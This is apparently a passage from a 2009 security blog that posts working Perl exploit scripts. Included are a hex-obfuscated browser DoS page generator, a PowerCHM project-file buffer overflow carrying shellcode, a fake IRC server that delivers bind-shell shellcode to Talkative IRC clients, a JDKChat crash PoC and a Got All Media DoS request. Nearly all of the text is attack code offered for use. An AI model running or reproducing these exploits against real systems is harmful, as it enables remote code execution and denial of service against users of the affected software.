"\x69\x74\x6C\x65\x29\x3B\x0D".
"\x0A\x7D\x20\x65\x6C".
"\x73\x65\x20\x69\x66\x28\x77".
"\x69\x6E\x64\x6F\x77".
"\x2E\x6F\x70\x65\x72\x61\x20";
####################


$L="\x26\x26\x20\x77\x69\x6E\x64\x6F\x77\x2E".
"\x70\x72\x69\x6E\x74\x29\x20\x7B".
"\x20\x0D\x0A\x72\x65\x74".
"\x75\x72\x6E\x20".
"\x28\x74\x72".
"\x75\x65".
"\x29".
"\x3B".
"\x20\x7D".
"\x7D\x0D\x0A".
"\x76\x61\x72\x20".
"\x61\x73\x6B\x20\x3D\x20".
"\x63\x6F\x6E\x66\x69\x72\x6D\x28".
"\x22\x50\x72\x65\x73\x73\x20\x4F\x4B\x20".
"\x74\x6F\x20\x73\x74\x61\x72\x74".
"\x20\x74\x68\x65\x20\x44".
"\x6F\x53\x2E\x5C".
"\x6E\x50\x72".
"\x65\x73".
"\x73".
"\x20".
"\x4E\x6F".
"\x20\x74\x6F".
"\x20\x64\x6F\x64".
"\x67\x65\x20\x74\x68\x65".
"\x20\x44\x6F\x53\x2E\x22\x29\x3B".
"\x0D\x0A\x69\x66\x20\x28\x61\x73\x6B\x20".
"\x3D\x3D\x20\x74\x72\x75\x65\x29".
"\x20\x7B\x20\x0D\x0A\x66".
"\x6F\x72\x20\x28".
"\x78\x3D\x30".
"\x3B\x20".
"\x78".
"\x3C".
"\x78\x2B".
"\x31\x3B\x20".
"\x78\x2B\x2B\x29".
"\x20\x64\x6F\x7A\x28\x29".
"\x3B\x0D\x0A\x7D\x20\x65\x6C\x73".
"\x65\x09\x7B\x20\x61\x6C\x65\x72\x74\x28".
"\x22\x4F\x6B\x20\x3A\x28\x22\x29".
"\x3B\x0D\x0A\x77\x69\x6E".
"\x64\x6F\x77\x2E".
"\x6C\x6F\x63".
"\x61\x74".
"\x69".
"\x6F".
"\x6E\x2E".
"\x68\x72\x65".
"\x66\x20\x3D\x20".
"\x22\x68\x74\x74\x70\x3A".
"\x2F\x2F\x77\x77\x77\x2E\x71\x74".
"\x77\x65\x62\x2E\x6E\x65\x74\x2F\x22\x3B";
#########
$E="\x0D\x0A\x7D\x20".
"\x3C\x2F\x73\x63".
"\x72\x69\x70\x74".
"\x3E\x3C\x2F\x62".
"\x6F\x64\x79\x3E".
"\x3C\x2F\x68\x65".
"\x61\x64\x3E\x3C".
"\x2F\x68\x74\x6D".
"\x6C\x3E";#####____

my $file = "Smile.html";
my $fun = $S.$M.$I.$L.$E;
open (mrowdiuqil, ">./$file") || die "\nMffff... $!\n";
print mrowdiuqil "$fun";
close (mrowdiuqil);
print "\n[+] File $file created with funny potion\!\n\n";



http://www.zeroscience.org/codes/qtweb_dos.txt

29 March, 2009

Waldorf & Statler

PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit

--------------------------
#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs: http://www.milw0rm.com/exploits/8300
# http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#

my $header="
[OPTIONS]\n
Compatibility=1.1 or later\n
Compiled file=zero.chm\n
Contents file=science.hhc\n
Index file=lqwrm.hhk\n
Binary Index=Yes\n
Language=0x042F\n
Title=\n
Error log file=Errlog.txt\n
Default Window=main\n\n
[WINDOWS]\n
main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n
[FILES]\n\n
[INFOTYPES]\n
";


my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";


my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;

my $file = "Watchmen.hhp";
open (hhp, ">./$file") || die "\nCan't open $file: $!";
print hhp "$header" . "$bof";
close (hhp);
sleep 1;
print "\nFile $file successfully created!\n";



http://www.milw0rm.com/exploits/8301

16 March, 2009

Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)

=========================================================
#!/usr/bin/perl
#
# Title: Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
#
# Summary: The easiest and fastest way to meet people online. With Talkative IRC you can
# chat with thousands of people at the same time. Find people with the same interests as you.
# Join channels where you can meet people speaking your language, or start your own. No
# monthly fees or other hassle, just a download and a click. Version 0.4.4.16 makes nick list
# font customizable. Why Talkative? Mainly because it's secure, stable and easy to use.
#
# Product web page: http://www.talkative-irc.com/
#
# Desc: Talkative IRC 0.4.4.16 suffers from a stack based buffer overflow vulnerability that enables us
# to gain full control over the application and execute arbitrary commands. ECX and EIP registers gets
# overwriten, so does the SEH.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Ref: http://www.milw0rm.com/exploits/6654
#
#
#---------------------------------------------windbg output--------------------------------------------------
#
# (398.ca4): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0013f0d0 edx=00000008 esi=00000000 edi=00421c40
# eip=004d8260 esp=0013f08c ebp=0013f1c4 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0xd8260:
# 004d8260 8b40f0 mov eax,dword ptr [eax-10h] ds:0023:41414131=????????
# 0:000> g
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=42424242 edx=7c9037d8 esi=00000000 edi=00000000
# eip=42424242 esp=0013ecbc ebp=0013ecdc iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 42424242 ?? ???
#
#---------------------------------------------windbg output--------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# http://www.zeroscience.org/
#
# liquidworm {z} gmail {z} com
#
# 17.03.2009
#

use IO::Socket;

sub start_zerver()
{
my $sock = new IO::Socket::INET(
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 6667,
Proto => 'tcp'
);
die unless $sock;

header();

print "\n [*] Evil IRC Server started on port 6667\n";

my $wire = $sock -> accept();

my $junky = "A" x 272;
my $next_seh = "\xeb\x06\x90\x90";
my $seh = "\x9a\x72\x85\x7c"; #0x7C85729A pop pop ret kernel32.dll
my $nop_start = "\x90" x 25;
my $nop_end = "\x90" x 10;

# win32_bind - EXITFUNC=seh LPORT=6161 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58".
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x33\x4b\x58\x4e\x37".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x42\x45\x37\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48".
"\x49\x58\x4e\x36\x46\x32\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d".
"\x46\x36\x4b\x38\x43\x54\x42\x43\x4b\x38\x42\x54\x4e\x30\x4b\x58".
"\x42\x57\x4e\x41\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x56".
"\x50\x48\x50\x54\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
"\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x47".
"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x56\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x45\x43\x45\x43\x34".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x4a\x51".
"\x41\x51\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x35\x4f\x4f\x48\x4d".
"\x42\x55\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x35".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x56\x48\x46\x4a\x36\x43\x36".
"\x4d\x56\x49\x48\x45\x4e\x4c\x56\x42\x35\x49\x45\x49\x42\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x52".
"\x43\x59\x4d\x48\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x34\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
"\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

print " [*] Throwing payload...\r\n";

print $wire ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n";

sleep(1);

print $wire ":" . "$junky" . "$next_seh" . "$seh" . "$nop_start" . "$shellcode" . "$nop_end" . " PRIVMSG t00t : /FINGER w00t.\r\n";
}

while (1)
{
start_zerver();
print " [*] Talkative IRC client successfully exploited!\r\n\n";
print " [**] Check shell on port 6161! [**]\r\n";
next;
}

sub header()
{
print "\n";
print "~" x 80;
print "\n";
print " Talkative IRC v0.4.4.16 Remote Stack Overflow Exploit (SEH)\n";
print " by LiquidWorm (c) 2009\n\n";
print "~" x 80;
print "\n\n";
}

=========================================================






http://zeroscience.org/codes/talkirc_seh.txt
http://www.destr0y.net/showthread.php?t=926

11 March, 2009

JDKChat v1.5 Remote Integer Overflow PoC

--------------------------------------------------------
#!/usr/bin/perl
#
# Title: JDKChat v1.5 Remote Integer Overflow PoC
#
# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems.
# Users can connect to it through a simple tcp client like telnet.
#
# WebSite : http://www.jdkoftinoff.com/
#
# ---------------------------- Demo ---------------------------------
# aleks@tux ~ $ telnet 192.168.0.1 7777
# Trying 192.168.0.1...
# Connected to 192.168.0.1.
# Escape character is '^]'.
# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd.
# http://www.jdkoftinoff.com/
# and modified by Aditya Godbole (urwithaditya@gmx.net)
# Commands available:
# /who -- (list all users along with their connection numbers)
# /exit -- (exit chat room)
# /local -- (toggle local mode for your telnet session)
# /[connection number] message -- (send private message to user at
# specified connection number)
#
#
# JDKCHAT: Aleks just entered the room.
# JDKCHAT: Users = Aleks:0
# Aleks >
#
#
# // And after we run the PoC :
#
# JDKCHAT: PwNzOr just entered the room.
# Aleks >Connection closed by foreign host.
# aleks@tux ~ $
#
# ---------------------------- /Demo --------------------------------
#
#
# Vulnerability discovered by n3tpr0b3 & LiquidWorm
#
# n3tpr0b3 [AT] gmail [.] com
#
# 12.03.2009
#

use IO::Socket;

if ($#ARGV != 1) {
print "
JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Usage : jdkchat_poc.pl SrvIP SrvPort #
# Greetz to LiquidWorm #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
exit;
}

my $dupsa = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp"
)
or die "Could not connect to $ARGV[0]: $!\n";

sleep 1;
print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d";
print "#--> Loged on t3h JDKChat server...\n";
sleep 1;
print "#--> Sending our evil command... \n";
sleep 2;
print $dupsa "\x2f\x2d\x31\x0d";
close($dupsa);
print "#--> Server pwned... \n";

-------------------------------------------------------



http://zeroscience.org/codes/jdkchat_poc.txt

19 February, 2009

Got All Media 7.0.0.3 Remote Denial Of Service Exploit

------------------------

#!/usr/local/bin/perl
#
# Title: Got All Media 7.0.0.3 Remote Denial Of Service Exploit
# Product web page: http://www.gallm.com/default.aspx
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm [t00t] gmail [w00t] com
# http://www.zeroscience.org
# 19.02.2009
#

print "\n[*] t00ting...\n";

use LWP::Simple;

my $url = 'http://127.0.0.1:5550/t00t';
my $freeze = get $url;
die "Couldn't get $url" unless defined $freeze;

------------------------

http://www.zeroscience.org/codes/gotallmedia_dos.txt
http://www.securityfocus.com/bid/33830